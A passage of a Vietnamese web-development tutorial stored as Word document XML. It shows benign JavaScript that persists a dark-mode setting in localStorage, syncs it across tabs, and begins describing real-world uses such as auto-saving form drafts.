    <w:p w14:paraId="14F7432F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    &lt;br&gt;&lt;br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD9267B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    &lt;button type="button" id="btn-clear-settings"&gt;Xóa cài đặt gốc&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A636AA" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408C0CDF" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="57D69D2E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F58C334" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    // Module Tiện ích: Đọc ghi Web Storage an toàn có try...catch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B458565" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    const StorageService = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651B55EC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // Ghi dữ liệu Object an toàn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BC1DAB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      set(key, value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCB0848" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B097FDB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          const serialized = JSON.stringify(value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467ADC42" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          localStorage.setItem(key, serialized);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7260B8CC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        } catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039E6EBD" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          // Bắt lỗi khi bộ nhớ đầy (QuotaExceededError)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700AE940" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          console.error(`Lỗi ghi vào LocalStorage [${key}]:`, error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA33CF9" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A671F0F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511F4D01" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="38D9EEF0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // Đọc dữ liệu và tự động phân tích cú pháp JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB04348" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      get(key, defaultValue = null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5411EFAE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F24CDD6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          const item = localStorage.getItem(key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F96C99" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          // Nếu không tồn tại, trả về giá trị mặc định</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C80BF6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          return item ? JSON.parse(item) : defaultValue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7FC929" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        } catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A552036" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          console.error(`Dữ liệu JSON bị hỏng tại [${key}], trả về mặc định:`, error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC163D2" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          return defaultValue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1F75EF" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFC3B66" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107F8F46" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="08A83465" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // Xóa khóa cụ thể</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EEB081" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      remove(key) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF605FA" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        localStorage.removeItem(key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B501BBE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B450C49" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F51233" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="6EC82BE1" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    const themeCheckbox = document.querySelector('#theme-checkbox');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10485286" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    const btnClear = document.querySelector('#btn-clear-settings');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419294DA" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="2F65558C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    // 1. KHỞI TẠO TRẠNG THÁI BAN ĐẦU: Đọc cài đặt đã lưu khi vừa vào trang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8FBA58" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    function initializeApp() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEC9DAE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // Đọc object cài đặt, nếu chưa có thì gán mặc định { isDark: false }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296A02A4" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      const userSettings = StorageService.get('app_user_settings', { isDark: false });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F40CBE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4799B395" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // Áp dụng lên giao diện ngay lập tức</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8B3DCF" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      applyTheme(userSettings.isDark);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECF1081" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      themeCheckbox.checked = userSettings.isDark;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B90AB2" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDBFC73" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="4B707A94" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    function applyTheme(isDark) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351B5F73" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      if (isDark) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762996E4" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        document.body.classList.add('dark-mode');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348E9A0C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB88384" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        document.body.classList.remove('dark-mode');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9A51E6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D448A18" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297294A2" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="2BBCE37E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    // 2. LẮNG NGHE THAY ĐỔI: Cập nhật storage khi người dùng tương tác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08702E0C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    themeCheckbox.addEventListener('change', (e) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A32A98" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      const isDark = e.target.checked;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A5F7D0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      applyTheme(isDark);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7220C44C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="6E177A5D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // Lưu nguyên một object trạng thái vào storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BE2B36" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      StorageService.set('app_user_settings', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8C7FF9" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        isDark: isDark,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181646A1" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        lastUpdated: new Date().toISOString()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A059CB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A18948" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1C3C09" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="65381DE7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    btnClear.addEventListener('click', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E011B1" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      StorageService.remove('app_user_settings');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131386EC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // Trả lại trạng thái mặc định</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2BDA7B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      applyTheme(false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00699D38" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      themeCheckbox.checked = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC11C9F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      alert('Đã khôi phục cài đặt gốc!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0173F135" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F94044" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="10234B85" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    // 3. ĐỒNG BỘ ĐA TAB: Lắng nghe thay đổi từ các tab khác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3514F1F4" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    window.addEventListener('storage', (event) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F92DFCC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      if (event.key === 'app_user_settings') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A0A439" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        const newSettings = JSON.parse(event.newValue);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC8F625" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        applyTheme(newSettings ? newSettings.isDark : false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5197E8AB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        themeCheckbox.checked = newSettings ? newSettings.isDark : false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC5D272" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F272F95" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5974F8" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="0BE92218" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    // Chạy khởi tạo ứng dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CD9796" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    initializeApp();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3D170E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AA4B74" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011D730B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D30E90" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Ứng dụng trong thực tế (Real-world use case)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E29289" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tình huống 1: Tự động Lưu Nháp Biểu Mẫu (Form Auto-Save Draft):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271C907A" w14:textId="27D32E92" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">Trong ứng dụng viết blog (như Medium hay WordPress), khi người dùng đang gõ một bài viết dài, cứ mỗi </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>2</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> giây JavaScript lại ghi nội dung tiêu đề và văn bản vào localStorage.setItem('draft_post', content). Nếu máy tính bị sập nguồn đột ngột hoặc người dùng vô tình bấm F5 tải lại trang, hệ thống sẽ đọc lại dữ liệu từ storage và khôi phục nguyên vẹn văn bản, tránh mất mát dữ liệu quan trọng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDF51CB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tình huống 2: Duy trì Trạng thái Đăng nhập Tạm thời trong Phiên (Session-based Workflow):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B51986F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
